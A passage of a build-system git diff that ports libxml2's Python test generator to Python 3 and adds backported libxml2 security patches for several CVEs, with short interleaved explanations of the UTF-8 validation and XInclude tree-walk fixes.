+- vals.append(vname)
+- if vals == []:
+- print "Didn't find any value for enum %s" % (name)
+- continue
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
+- test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
+- test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
+- (name, name))
+- i = 1
+- for value in vals:
+- test.write(" if (no == %d) return(%s);\n" % (i, value))
+- i = i + 1
+- test.write(""" return(0);
++ if (name in argtypes) and is_known_param_type(name) == 0:
++ values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
++ i = 0
++ vals = []
++ for value in values:
++ vname = value.xpathEval('string(@name)')
++ if vname == None:
++ continue;
++ i = i + 1
++ if i >= 5:
++ break;
++ vals.append(vname)
++ if vals == []:
++ print("Didn't find any value for enum %s" % (name))
++ continue
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
++ test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
++ test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
++ (name, name))
++ i = 1
++ for value in vals:
++ test.write(" if (no == %d) return(%s);\n" % (i, value))
++ i = i + 1
++ test.write(""" return(0);
+ }
+
+ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name));
+- known_param_types.append(name)
++ known_param_types.append(name)
+
+ if (is_known_return_type(name) == 0) and (name in rettypes):
+- if define == 0 and modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if define == 0 and (module in modules_defines):
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name))
+- known_return_types.append(name)
++ known_return_types.append(name)
+ if define == 1:
+ test.write("#endif\n\n")
+
+@@ -615,9 +615,9 @@ for file in headers:
+ # do not test deprecated APIs
+ #
+ desc = file.xpathEval('string(description)')
+- if string.find(desc, 'DEPRECATED') != -1:
+- print "Skipping deprecated interface %s" % name
+- continue;
++ if desc.find('DEPRECATED') != -1:
++ print("Skipping deprecated interface %s" % name)
++ continue;
+
+ test.write("#include <libxml/%s.h>\n" % name)
+ modules.append(name)
+@@ -679,7 +679,7 @@ def generate_test(module, node):
+ # and store the informations for the generation
+ #
+ try:
+- args = node.xpathEval("arg")
++ args = node.xpathEval("arg")
+ except:
+ args = []
+ t_args = []
+@@ -687,37 +687,37 @@ def generate_test(module, node):
+ for arg in args:
+ n = n + 1
+ rtype = arg.xpathEval("string(@type)")
+- if rtype == 'void':
+- break;
+- info = arg.xpathEval("string(@info)")
+- nam = arg.xpathEval("string(@name)")
++ if rtype == 'void':
++ break;
++ info = arg.xpathEval("string(@info)")
++ nam = arg.xpathEval("string(@name)")
+ type = type_convert(rtype, nam, info, module, name, n)
+- if is_known_param_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
++ if is_known_param_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
+ if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
+- rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
+- t_args.append((nam, type, rtype, crtype, info))
++ rtype[0:6] == 'const ':
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
++ t_args.append((nam, type, rtype, crtype, info))
+
+ try:
+- rets = node.xpathEval("return")
++ rets = node.xpathEval("return")
+ except:
+ rets = []
+ t_ret = None
+ for ret in rets:
+ rtype = ret.xpathEval("string(@type)")
+- info = ret.xpathEval("string(@info)")
++ info = ret.xpathEval("string(@info)")
+ type = type_convert(rtype, 'return', info, module, name, 0)
+- if rtype == 'void':
+- break
+- if is_known_return_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
+- t_ret = (type, rtype, info)
+- break
++ if rtype == 'void':
++ break
++ if is_known_return_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
++ t_ret = (type, rtype, info)
++ break
+
+ if no_gen == 0:
+ for t_arg in t_args:
+@@ -733,7 +733,7 @@ test_%s(void) {
+
+ if no_gen == 1:
+ add_missing_functions(name, module)
+- test.write("""
++ test.write("""
+ /* missing type support */
+ return(test_ret);
+ }
+@@ -742,22 +742,22 @@ test_%s(void) {
+ return
+
+ try:
+- conds = node.xpathEval("cond")
+- for cond in conds:
+- test.write("#if %s\n" % (cond.get_content()))
+- nb_cond = nb_cond + 1
++ conds = node.xpathEval("cond")
++ for cond in conds:
++ test.write("#if %s\n" % (cond.get_content()))
++ nb_cond = nb_cond + 1
+ except:
+ pass
+
+ define = 0
+- if function_defines.has_key(name):
++ if name in function_defines:
+ test.write("#ifdef %s\n" % (function_defines[name]))
+- define = 1
++ define = 1
+
+ # Declare the memory usage counter
+ no_mem = is_skipped_memcheck(name)
+ if no_mem == 0:
+- test.write(" int mem_base;\n");
++ test.write(" int mem_base;\n");
+
+ # Declare the return value
+ if t_ret != None:
+@@ -766,29 +766,29 @@ test_%s(void) {
+ # Declare the arguments
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # add declaration
+- test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
+- test.write(" int n_%s;\n" % (nam))
++ # add declaration
++ test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
++ test.write(" int n_%s;\n" % (nam))
+ test.write("\n")
+
+ # Cascade loop on of each argument list of values
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
+- nam, nam, type, nam))
++ #
++ test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
++ nam, nam, type, nam))
+
+ # log the memory usage
+ if no_mem == 0:
+- test.write(" mem_base = xmlMemBlocks();\n");
++ test.write(" mem_base = xmlMemBlocks();\n");
+
+ # prepare the call
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
+- i = i + 1;
++ #
++ test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
++ i = i + 1;
+
+ # add checks to avoid out-of-bounds array access
+ i = 0;
+@@ -797,7 +797,7 @@ test_%s(void) {
+ # assume that "size", "len", and "start" parameters apply to either
+ # the nearest preceding or following char pointer
+ if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
+- for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
++ for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
+ (bnam, btype) = t_args[j][:2]
+ if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
+ test.write(
+@@ -806,42 +806,42 @@ test_%s(void) {
+ " continue;\n"
+ % (bnam, nam, bnam))
+ break
+- i = i + 1;
++ i = i + 1;
+
+ # do the call, and clanup the result
+- if extra_pre_call.has_key(name):
+- test.write(" %s\n"% (extra_pre_call[name]))
++ if name in extra_pre_call:
++ test.write(" %s\n"% (extra_pre_call[name]))
+ if t_ret != None:
+- test.write("\n ret_val = %s(" % (name))
+- need = 0
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam);
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
+- test.write(" desret_%s(ret_val);\n" % t_ret[0])
++ test.write("\n ret_val = %s(" % (name))
++ need = 0
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam);
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
++ test.write(" desret_%s(ret_val);\n" % t_ret[0])
+ else:
+- test.write("\n %s(" % (name));
+- need = 0;
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam)
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
++ test.write("\n %s(" % (name));
++ need = 0;
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam)
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
+
+ test.write(" call_tests++;\n");
+
+@@ -849,32 +849,32 @@ test_%s(void) {
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # This is a hack to prevent generating a destructor for the
+- # 'input' argument in xmlTextReaderSetup. There should be
+- # a better, more generic way to do this!
+- if string.find(info, 'destroy') == -1:
+- test.write(" des_%s(n_%s, " % (type, nam))
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s, %d);\n" % (nam, i))
+- i = i + 1;
++ # This is a hack to prevent generating a destructor for the
++ # 'input' argument in xmlTextReaderSetup. There should be
++ # a better, more generic way to do this!
++ if info.find('destroy') == -1:
++ test.write(" des_%s(n_%s, " % (type, nam))
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s, %d);\n" % (nam, i))
++ i = i + 1;
+
+ test.write(" xmlResetLastError();\n");
+ # Check the memory usage
+ if no_mem == 0:
+- test.write(""" if (mem_base != xmlMemBlocks()) {
++ test.write(""" if (mem_base != xmlMemBlocks()) {
+ printf("Leak of %%d blocks found in %s",
+- xmlMemBlocks() - mem_base);
+- test_ret++;
++\t xmlMemBlocks() - mem_base);
++\t test_ret++;
+ """ % (name));
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- test.write(""" printf(" %%d", n_%s);\n""" % (nam))
+- test.write(""" printf("\\n");\n""")
+- test.write(" }\n")
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ test.write(""" printf(" %%d", n_%s);\n""" % (nam))
++ test.write(""" printf("\\n");\n""")
++ test.write(" }\n")
+
+ for arg in t_args:
+- test.write(" }\n")
++ test.write(" }\n")
+
+ test.write(" function_tests++;\n")
+ #
+@@ -882,7 +882,7 @@ test_%s(void) {
+ #
+ while nb_cond > 0:
+ test.write("#endif\n")
+- nb_cond = nb_cond -1
++ nb_cond = nb_cond -1
+ if define == 1:
+ test.write("#endif\n")
+
+@@ -900,10 +900,10 @@ test_%s(void) {
+ for module in modules:
+ # gather all the functions exported by that module
+ try:
+- functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
++ functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
+ except:
+- print "Failed to gather functions from module %s" % (module)
+- continue;
++ print("Failed to gather functions from module %s" % (module))
++ continue;
+
+ # iterate over all functions in the module generating the test
+ i = 0
+@@ -923,14 +923,14 @@ test_%s(void) {
+ # iterate over all functions in the module generating the call
+ for function in functions:
+ name = function.xpathEval('string(@name)')
+- if is_skipped_function(name):
+- continue
+- test.write(" test_ret += test_%s();\n" % (name))
++ if is_skipped_function(name):
++ continue
++ test.write(" test_ret += test_%s();\n" % (name))
+
+ # footer
+ test.write("""
+ if (test_ret != 0)
+- printf("Module %s: %%d errors\\n", test_ret);
++\tprintf("Module %s: %%d errors\\n", test_ret);
+ return(test_ret);
+ }
+ """ % (module))
+@@ -948,7 +948,7 @@ test.write(""" return(0);
+ }
+ """);
+
+-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
++print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
+
+ compare_and_save()
+
+@@ -960,11 +960,8 @@ for missing in missing_types.keys():
+ n = len(missing_types[missing])
+ missing_list.append((n, missing))
+
+-def compare_missing(a, b):
+- return b[0] - a[0]
+-
+-missing_list.sort(compare_missing)
+-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
+missing_list.sort(key=lambda a: a[0], reverse=True)
++print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
+ lst = open("missing.lst", "w")
+ lst.write("Missing support for %d types" % (len(missing_list)))
+ lst.write("\n")
+@@ -974,9 +971,9 @@ for miss in missing_list:
+ for n in missing_types[miss[1]]:
+ i = i + 1
+ if i > 5:
+- lst.write(" ...")
+- break
+- lst.write(" %s" % (n))
++ lst.write(" ...")
++ break
++ lst.write(" %s" % (n))
+ lst.write("\n")
+ lst.write("\n")
+ lst.write("\n")
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
new file mode 100644
index 0000000000..5301d05323
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
+From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 15 Aug 2020 18:32:29 +0200
+Subject: [PATCH] Revert "Do not URI escape in server side includes"
+
+This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
+
+This commit introduced
+
+- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
+- an algorithm with quadratic runtime
+- a security issue, see
+ https://bugzilla.gnome.org/show_bug.cgi?id=769760
+
+A better approach is to add an option not to escape URLs at all,
+which libxml2 possibly should have done in the first place.
+
+CVE: CVE-2016-3709
+Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+---
+ HTMLtree.c | 49 +++++++++++--------------------------------------
+ 1 file changed, 11 insertions(+), 38 deletions(-)
+
+diff --git a/HTMLtree.c b/HTMLtree.c
+index 8d236bb35..cdb7f86a6 100644
+--- a/HTMLtree.c
++++ b/HTMLtree.c
+@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
+ (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
+ ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
+ (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
++ xmlChar *escaped;
+ xmlChar *tmp = value;
+- /* xmlURIEscapeStr() escapes '"' so it can be safely used. */
+- xmlBufCCat(buf->buffer, "\"");
+
+ while (IS_BLANK_CH(*tmp)) tmp++;
+
+- /* URI Escape everything, except server side includes. */
+- for ( ; ; ) {
+- xmlChar *escaped;
+- xmlChar endChar;
+- xmlChar *end = NULL;
+- xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
+- if (start != NULL) {
+- end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
+- if (end != NULL) {
+- *start = '\0';
+- }
+- }
+-
+- /* Escape the whole string, or until start (set to '\0'). */
+- escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
+- if (escaped != NULL) {
+- xmlBufCat(buf->buffer, escaped);
+- xmlFree(escaped);
+- } else {
+- xmlBufCat(buf->buffer, tmp);
+- }
+-
+- if (end == NULL) { /* Everything has been written. */
+- break;
+- }
+-
+- /* Do not escape anything within server side includes. */
+- *start = '<'; /* Restore the first character of "<!--". */
+- end += 3; /* strlen("-->") */
+- endChar = *end;
+- *end = '\0';
+- xmlBufCat(buf->buffer, start);
+- *end = endChar;
+- tmp = end;
++ /*
++ * the < and > have already been escaped at the entity level
++ * And doing so here breaks server side includes
++ */
++ escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
++ if (escaped != NULL) {
++ xmlBufWriteQuotedString(buf->buffer, escaped);
++ xmlFree(escaped);
++ } else {
++ xmlBufWriteQuotedString(buf->buffer, value);
+ }
+-
+- xmlBufCCat(buf->buffer, "\"");
+ } else {
+ xmlBufWriteQuotedString(buf->buffer, value);
+ }
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
new file mode 100644
index 0000000000..200f42091e
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
+From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 21 Apr 2021 13:23:27 +0200
+Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
+
+Call htmlCtxtUseOptions to make sure that names aren't stored in
+dictionaries.
+
+Note that this issue only affects xmllint using the HTML push parser.
+
+Fixes #230.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
+CVE: CVE-2021-3516
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmllint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/xmllint.c b/xmllint.c
+index 6ca1bf54d..dbef273a8 100644
+--- a/xmllint.c
++++ b/xmllint.c
+@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
+ if (res > 0) {
+ ctxt = htmlCreatePushParserCtxt(NULL, NULL,
+ chars, res, filename, XML_CHAR_ENCODING_NONE);
+- xmlCtxtUseOptions(ctxt, options);
++ htmlCtxtUseOptions(ctxt, options);
+ while ((res = fread(chars, 1, pushsize, f)) > 0) {
+ htmlParseChunk(ctxt, chars, res, 0);
+ }
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
new file mode 100644
index 0000000000..e88a8ae7c6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
+From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
+From: Joel Hockey <joel.hockey@gmail.com>
+Date: Sun, 16 Aug 2020 17:19:35 -0700
+Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
+
+Code is currently assuming UTF-8 without validating. Truncated UTF-8
+input can cause out-of-bounds array access.
+
+Adds further checks to partial fix in 50f06b3e.
+
+Fixes #178
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
+CVE: CVE-2021-3517
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ entities.c | 16 +++++++++++++++-
+ 1 file changed, 15 insertions(+), 1 deletion(-)
+
+diff --git a/entities.c b/entities.c
+index 37b99a56..1a8f86f0 100644
+--- a/entities.c
++++ b/entities.c
+@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
+ } else {
+ /*
+ * We assume we have UTF-8 input.
++ * It must match either:
++ * 110xxxxx 10xxxxxx
++ * 1110xxxx 10xxxxxx 10xxxxxx
++ * 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
++ * That is:
++ * cur[0] is 11xxxxxx
++ * cur[1] is 10xxxxxx
++ * cur[2] is 10xxxxxx if cur[0] is 111xxxxx
++ * cur[3] is 10xxxxxx if cur[0] is 1111xxxx
++ * cur[0] is not 11111xxx
+ */
+ char buf[11], *ptr;
+ int val = 0, l = 1;
+
+- if (*cur < 0xC0) {
++ if (((cur[0] & 0xC0) != 0xC0) ||
++ ((cur[1] & 0xC0) != 0x80) ||
++ (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF8) == 0xF8))) {
+ xmlEntitiesErr(XML_CHECK_NOT_UTF8,
+ "xmlEncodeEntities: input not UTF-8");
+ if (doc != NULL)
+--
+GitLab
+
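The structural checks added in CVE-2021-3517.patch reject truncated multi-byte sequences by validating the lead byte and each required continuation byte before the decoder reads past them. The following standalone sketch illustrates the same idea; it is not the libxml2 code, the names are hypothetical, and unlike the patch it takes an explicit length instead of relying on NUL termination.

#include <stddef.h>

/* Return the sequence length (2..4) if the bytes at p start a structurally
 * valid multi-byte UTF-8 sequence, or 0 otherwise. Overlong encodings and
 * surrogates are not rejected here; only the byte-pattern checks mirrored
 * from the patch are applied. */
static int utf8_seq_len(const unsigned char *p, size_t avail)
{
    int len, i;

    if (avail == 0 || (p[0] & 0xC0) != 0xC0)  /* lead byte must be 11xxxxxx */
        return 0;
    if ((p[0] & 0xF8) == 0xF8)                /* 11111xxx is never valid    */
        return 0;
    if ((p[0] & 0xF0) == 0xF0)
        len = 4;                              /* 11110xxx -> 4 bytes        */
    else if ((p[0] & 0xE0) == 0xE0)
        len = 3;                              /* 1110xxxx -> 3 bytes        */
    else
        len = 2;                              /* 110xxxxx -> 2 bytes        */

    if ((size_t)len > avail)                  /* truncated input            */
        return 0;
    for (i = 1; i < len; i++)
        if ((p[i] & 0xC0) != 0x80)            /* continuations: 10xxxxxx    */
            return 0;
    return len;
}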
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
new file mode 100644
index 0000000000..40d3debea1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
+From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 10 Jun 2020 16:34:52 +0200
+Subject: [PATCH 1/2] Don't recurse into xi:include children in
+ xmlXIncludeDoProcess
+
+Otherwise, nested xi:include nodes might result in a use-after-free
+if XML_PARSE_NOXINCNODE is specified.
+
+Found with libFuzzer and ASan.
+
+Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
+
+The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified
+so as to avoid unnecessary modifications to fallback files.
+
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index ba850fa5..f260c1a7 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ * First phase: lookup the elements in the document
+ */
+ cur = tree;
+- if (xmlXIncludeTestNode(ctxt, cur) == 1)
+- xmlXIncludePreProcessNode(ctxt, cur);
+ while ((cur != NULL) && (cur != tree->parent)) {
+ /* TODO: need to work on entities -> stack */
+- if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
+- cur = cur->children;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+- } else if (cur->next != NULL) {
++ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
++ xmlXIncludePreProcessNode(ctxt, cur);
++ } else if ((cur->children != NULL) &&
++ (cur->children->type != XML_ENTITY_DECL) &&
++ (cur->children->type != XML_XINCLUDE_START) &&
++ (cur->children->type != XML_XINCLUDE_END)) {
++ cur = cur->children;
++ continue;
++ }
++ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ } else {
+ if (cur == tree)
+ break;
+@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ break; /* do */
+ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ break; /* do */
+ }
+ } while (cur != NULL);
+--
+2.32.0
+
+
+From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 22 Apr 2021 19:26:28 +0200
+Subject: [PATCH 2/2] Fix use-after-free with `xmllint --xinclude --dropdtd`
+
+The --dropdtd option can leave dangling pointers in entity reference
+nodes. Make sure to skip these nodes when processing XIncludes.
+
+This also avoids scanning entity declarations and even modifying
+them inadvertently during XInclude processing.
+
+Move from a block list to an allow list approach to avoid descending
+into other node types that can't contain elements.
+
+Fixes #237.
+Upstream-Status: Backport
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index f260c1a7..d7648529 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
+ xmlXIncludePreProcessNode(ctxt, cur);
+ } else if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
++ ((cur->type == XML_DOCUMENT_NODE) ||
++ (cur->type == XML_ELEMENT_NODE))) {
+ cur = cur->children;
+ continue;
+ }
+--
+2.32.0
+
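Both hunks of CVE-2021-3518.patch reshape the same non-recursive tree walk: each node is either handled as an XInclude, or the walk descends only into node types that can contain elements (the allow-list of the second hunk), otherwise it moves to the next sibling and climbs back up when a subtree is exhausted. A hedged, generic sketch of that traversal shape, using an invented node structure rather than libxml2's xmlNode:

#include <stddef.h>

enum node_type { NODE_DOCUMENT, NODE_ELEMENT, NODE_TEXT, NODE_ENTITY_DECL };

struct node {
    enum node_type type;
    struct node *parent;
    struct node *children;
    struct node *next;
};

/* Pre-order walk without recursion, descending only into node types that
 * may contain elements, as in the allow-list version of the fix. */
static void walk(struct node *tree, void (*visit)(struct node *))
{
    struct node *cur = tree;

    while (cur != NULL) {
        visit(cur);

        if (cur->children != NULL &&
            (cur->type == NODE_DOCUMENT || cur->type == NODE_ELEMENT)) {
            cur = cur->children;          /* descend */
            continue;
        }
        while (cur != NULL && cur != tree && cur->next == NULL)
            cur = cur->parent;            /* climb until a sibling exists */
        if (cur == NULL || cur == tree)
            break;                        /* back at the root: done */
        cur = cur->next;                  /* move to the next sibling */
    }
}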
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
new file mode 100644
index 0000000000..9e64c2a36d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
+From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 1 May 2021 16:53:33 +0200
+Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
+
+Check return value of recursive calls to
+xmlParseElementChildrenContentDeclPriv and return immediately in case
+of errors. Otherwise, struct xmlElementContent could contain unexpected
+null pointers, leading to a null deref when post-validating documents
+which aren't well-formed and parsed in recovery mode.
+
+Fixes #243.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
+CVE: CVE-2021-3537
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ parser.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index b42e6043..73c27edd 100644
+--- a/parser.c
++++ b/parser.c
+@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (cur == NULL)
++ return(NULL);
+ SKIP_BLANKS;
+ GROW;
+ } else {
+@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (last == NULL) {
++ if (ret != NULL)
++ xmlFreeDocElementContent(ctxt->myDoc, ret);
++ return(NULL);
++ }
+ SKIP_BLANKS;
+ } else {
+ elem = xmlParseName(ctxt);
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
new file mode 100644
index 0000000000..1f392b4cd7
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
+From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
+From: Daniel Veillard <veillard@redhat.com>
+Date: Thu, 13 May 2021 14:55:12 +0200
